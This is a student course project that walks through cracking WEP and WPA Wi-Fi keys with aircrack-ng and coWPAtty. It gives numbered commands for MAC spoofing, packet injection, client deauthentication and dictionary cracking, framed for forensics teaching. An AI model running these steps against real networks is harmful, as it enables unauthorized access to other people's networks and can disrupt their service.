Final Video Team Project

Team Epsilon

April 13, 2011

Team Members: Ian Levy, Anthony Kuny, Jennifer Strawn, Jordan Godfrey, Mary Viloria

Emails: , , , ,

Table of Content

I . Introduction………………………………………………………………………………3

II . Written Instructions……………………………………………………………………..4

A .Cracking WEP…………………………………………………………………..4

B . Cracking WPA…………………………………………………………………..6

C .CoWPAtty……………………………………………………………………….7

III . Step-by-step Instructions……………………………………………………………….8

A . Cracking WEP…………………………………………………………………..8

B . Cracking WPA…………………………………………………………………..9

C . Cracking WPA with CoWPAtty…………………………………………………9

III . References………………………………………………………………………………10

I . Introduction

Wireless cracking is part of penetration testing that gains access to wireless networks.Criminals usually gain access without authorization or through social engineering.For computer and cyber forensics this applies to criminals using password cracking and possibly altering important files. We will set up a scenario where a criminal has a WEP/WPA/2 network in range and is attempting to gain unauthorized access to the network. We will do this by using backtrack 4r2 which is an operating system designed for penetration testers that can easily be installed to run on an USB.Pre-installed in backtrack is a program suite called aircrack-ng that is used for password cracking using packet injection, dictionary and brute force attacks.Through this we will show detailed steps on how weak encryption standards can easily be cracked.Also, we will show how strong encryption standards can easily be cracked with weak passwords.For cracking WEP we will use packet injection to increase the initialization vectors between the host and router.Doing this we will be able to obtain the wireless key in hex form which can be entered in instead of the actual text password to gain access.For WPA/2 we will obtain a handshake from the router that can be used by offline password cracking programs to attempt to either brute force attack or a dictionary attack to find the password.This method will require the actual text of the password.There are plenty of offline password cracker programs available to use, but we as a group will focus on using aircrack-ng suite and coWPAtty.

This fits into cyber forensics because wireless cracking can be done by criminals trying to gain access to networks they are trying to gain information from. In cyber forensics, our job is to retrace steps and gain information and data to show how these types of criminals gained access to these networks and try to establish the reasoning behind these actions. We will use cyber forensics to collect preserve and present this data as you would in a law abiding type of setting.
The reason this is important in this perspective is to first demonstrate how the cracking is accomplished but overall this is useful to any person who intends to investigate network security. Not only should the steps be known on how to successfully gain access to wireless networks, we also believe it is useful to learn how to keep computer information private and secure. The first step is to make sure there is a firewall installed and working correctly by putting in place auto updates that way the computer is always current. Next, it is important to ensure the settings of the firewall are in place based on the usage on the computer. Lastly, is it imperative to have strong substantial passwords to ensure the network as well as the individual computer is protected at the best of the user’s capabilities. To test these revisions in the network, the first step it to look for leaks by running a leak test using a free online version for example the Gibson Research Corporation’s LeakTest. Understanding these steps and the ways to prevent wireless encryption cracking is just as important because it ensures protection to any computer and is essential in keeping privacy and confidentiality.

II . Written Instructions

In cyber forensics understanding how to break into networks is extremely important. It is essential for the analyst because it will allow them to interpret the router logs and see that there was an increase of packets possibly indicating that there was an attack to either perform a denial of service or to increase initialization vectors to crack WEP encryption. This video documentation will help explain why this is important and walk through each command and purpose throughout cracking WEP and WPA encryption.

Cracking WEP

First, in order to crack WEP, wired equivalent privacy, we need to do some housekeeping. We will boot into Backtrack which is a linux based operating system and then we need to launch the konsole which opens up the command line in backtrack. We will use the aircrack-ng suite to break into a WEP encrypted network. Within the konsole we will find out which devices are available to us.

In order to do this we will use the command airmon-ng.As you can see we have a couple devices, wlan0 and wlan1, we will use wlan0. Now the next task is to put the wireless card in monitor mode and spoof the mac address to make it easier for latter commands. In order to change the mac address we first need to put the interface down. We will do this by using the ifconfig wlan0 down command.ifconfig is the command, wlan0 is the interface and down s the command option to put the interface down. Then we will change the mac address by using the command macchanger -- mac 00:11:22:33:44:55 wlan0. macchanger is the command, mac is the command option and the mac address is the new desired mac address and wlan0 is the interface to make the desired changes to.

Now we will put the card in monitor mode by using the airmon-ng start wlan0 command. airmon-ng is the command, wlan0 is the interface and start is the command option to start the interface. As you can see the airmon command in aircrack-ng create another interface that reads mon0. This is because of the drivers used to make this specific wireless card compatible with the aircrack-ng suite that is already preinstalled when backtrack is booted up. Now we will scan for any vulnerable WEP encrypted networks. We are able to do this by using the airodump-ng mon0 command. airodump-ng is the command and we are telling it to use mon0 which is the new interface we created to scan all the channels to see if any networks are in range. As you can see all the networks in range are appearing as the wireless card scans all the channels. To stop the scan you will want to hit Ctrl+C. Now that we have found a vulnerable network we are going to sniff and capture the traffic at the access point. We will do this by using airodump-ng –c (channel) –w (file name) –bssid (bssid) (interface). C is for the channel that the vulnerable network is broadcasting on. The w option is for what name you want to give the .cap file for cracking later and the bssid is the mac address of the vulnerable network. mon0 is the interface we are using to sniff the packets. Now we are able to see if there are any connected clients to the vulnerable network and also able to collect data being sent between the connected clients.

Next is to fake associated our interface with the access point of the vulnerable network. First we will open up another tab within the konsole window. We will then send the fake associated packets using the aireplay-ng command. We will us the command aireplay-ng -1 0 –a (bssid) –h (our interface that we changed to) 00:11:22:33:44:55 mon0 (which is our interface, (our mac address<just say that instead of all the numbers)As you can see we were successful with the konsole message state Association successful :-) (smiley face)Now with that nice little confirmation message we are able to perform packet injection against the vulnerable network. We could wait and not make our presence known to any connected clients but we don’t have time to wait. With packet injection it could potentially perform a denial of service because we are sending so many packets to increase the data we are trying to capture. This usually only take a few minutes tops and shouldn’t be too disruptive. Now, for the actual command to make all this happen.We will us the aireplay-ng command again, aireplay-ng -3 (which is the command option to send fake packets) –b (the mac address of the vulnerable access point) –h (our interface) 00:11:22:33:44:55 mon0 (our interface). With this command we are creating network traffic to speed up the crack. When we switch back to our previous tab where we are sniffing the network we are able to see the data column increase rapidly.

Now that we are confirming that packets are being injected we will open up another window to crack the vulnerable network. In our newly opened tab we will start our cracking by using the aircrack-ngcommand. Entering into the command line aircrack-ng - b(mac address of the vulnerable access point) filename-01.cap (which is the file name we created with the –w option) As you can see aircrack-ng is bruteforcing to find the network key for the vulnerable. When the command successfully find the network key the command will return a command stating KEY FOUND with the key in hexadecimal form. You will be able to connect to the vulnerable network by dropping the colons and entering it into the network key.

B . Cracking WPA

WPA stands for WiFi Protected Access. We will perform similar commands as we did when we cracked WEP but instead of aircrack-ng brute forcing by itself we need to test the password with a dictionary attack. A dictionary attack is where a text file is compiled of all the possible network keys that you think will crack the password. Also, in some cases a dictionary attack may only have words that are in the dictionary but that is to be considered a weak word lists. We will use the aircrack-ng suite to break into a WPA encrypted network. Within the konsole we will find out which devices are available to us. In order to do this we will use the command airmon-ng.As you can see we have a couple devices, wlan0 and wlan1, we will use wlan0. Now the next task is to put the wireless card in monitor mode and spoof the mac address to make it easier for latter commands. In order to change the mac address we first need to put the interface down. We will do this by using the ifconfig wlan0 down command. ifconfig is the command, wlan0 is the interface and down s the command option to put the interface down. Then we will change the mac address by using the command macchanger -- mac 00:11:22:33:44:55 wlan0. macchanger is the command, mac is the command option and the mac address is the new desired mac address and wlan0 is the interface to make the desired changes to. Now we will put the card in monitor mode by using the airmon-ng start wlan0 command. airmon-ng is the command, wlan0 is the interface and start is the command option to start the interface. As you can see the airmon command in aircrack-ng create another interface that reads mon0. This is because of the drivers used to make this specific wireless card compatible with the aircrack-ng suite that is already preinstalled when backtrack is booted up. Now we will scan for any WPA encrypted networks. We are able to do this by using the airodump-ng mon0 command. airodump-ng is the command and we are telling it to use mon0 which is the new interface we created to scan all the channels to see if any networks are in range. As you can see all the networks in range are appearing as the wireless card scans all the channels. To stop the scan you will want to hit Ctrl+C. Now that we have found a WPA network we are going to sniff and capture the traffic at the access point. We will do this by using airodump-ng –c (channel) –w (file name) –bssid (bssid) (interface). C is for the channel that the vulnerable network is broadcasting on. The w option is for what name you want to give the .cap file for cracking later and the bssid is the mac address of the vulnerable network. mon0 is the interface we are using to sniff the packets. Now we are able to see if there are any connected clients to the network and also able to collect data being sent between the connected clients. Next we to have some connecting clients to force re-authentication so we can capture the handshake. Once we have captured the hand shake we can then perform the crack off line. We will open up a text editor and copy down the connected mac address and use it for our next command. Now we open up another tab and use the command aireplay-ng -0 1 -a (mac address of the access point) –c(mac address of the connected client). -0 option is the deauth command and the next number is how packets to send.

Once you have successfully entered in the command, we will switch back to our first tap and you will notice in the top right hand corner that we have successfully captured the four way handshake.Now we will stop sniffing the network by hitting Crtl + C. Then we will use the aircrack-ngcommand to try and run through a wordlist to crack the password. We will enteraircrack-ng –w (file location of the wordlist) –b (mac address of the access point we are attempting to gain access to) and then the file location of the captured four way handshake. Then aircrack-ng will run through the wordlist and try to crack the wpa password. As you can see we are successful and the password is password.

C .CoWPAtty

Now we are going to use Cowpatty, an alternative method to WPA cracking. We are going to type cowpatty then dash r is the capture handshake containing the fourway handshake, dash f is the file location of the word list you want to use for cracking the password. Now, dash s is the SSID of the network you are trying to access, at the end, press enter. Cowpatty will run through the word list and try to find the password, as you can see, it successfully found the word "password".

III . Step-by-step Instructions

A . Cracking WEP

*Hit enter after every step except for 6 and 8

Step 1: Type airmon-ng

Step 2:Typeifconfig wlan0 down

Step 3: Type macchanger -- mac 00:11:22:33:44:55 wlan0.

Step 4: Type airmon-ng start wlan0

Step 5: Type airodump-ng mon0

Step 6: To stop the scan you will want to hit Ctrl+C.

Step 7: Type airodump-ng –c (channel) –w (file name) –bssid (bssid) (interface).

Step 8: Open another tab with the console

Step 9: Type aireplay-ng -1 0 –a (bssid) –h 00:11:22:33:44:55 mon0

Step 10:Once you see this screen, you have successfully associated with the access point.

Step 11: Type aireplay-ng -3 –b (the mac address of the vulnerable access point) –h 00:11:22:33:44:55 mon0.

Step 12: Type aircrack-ng - b(mac address of the vulnerable access point) filename-01.cap (which is the file name we created with the –w option) When the command successfully find the network key the command will return a command stating KEY FOUND with the key in hexadecimal form.

Step 13: You will be able to connect to the vulnerable network by dropping the colons and entering it into the network key.

B . Cracking WPA

*Hit enter after every step except for 6 and 8

Step 1: Type airmon-ng

Step 2:Typeifconfig wlan0 down command.

Step 3: Type macchanger -- mac 00:11:22:33:44:55 wlan0.

Step 4: Type airmon-ng start wlan0

Step 5: Type airodump-ng mon0

Step 6: To stop the scan you will want to hit Ctrl+C.

Step 7: Type airodump-ng –c (channel) –w (file name) –bssid (bssid) (interface).

Step 8: Open another tab with the console

Step 9:aireplay-ng -0 1 -a (mac address of the access point) –c(mac address of the connected client). -0 option is the deauth command and the next number is how packets to send.

Step 10:aircrack-ng –w (file location of the wordlist) –b (mac address of the access point we are attempting to gain access to) and then the file location of the captured four way handshake.

Step 11: If password is in the defined word list, Aircracking will return the password. If not, it will say “Password not in dictionary” and you will need to try another list.

C . Cracking WPA with CoWPAtty

Note: This is used after you have capture the four way handshake

Step 1: Enter in cowpatty –r (captured four way handshake) –f (file location of the word

list) –s (network SSID)

Step 2:CoWPAtty will return the password if it is in the dictionary provided, if not, it state that the password was not in the dictionary file and to try expanding your list.

III .References

IT Security Editors. “10 Steps To Securing Firewalls.” 22 January 2007. Web. 4 April 2011.

"SpeedGuide.net :: How To Crack WEP and WPA Wireless Networks."SpeedGuide.net :: The

Broadband Guide.Web. 28 Feb. 2011. <

Tews, Erik, Ralf-Philipp Weinmann, and Andrei Pyshkin. "Breaking 104 Bit WEP in Less than

60 Seconds." Web.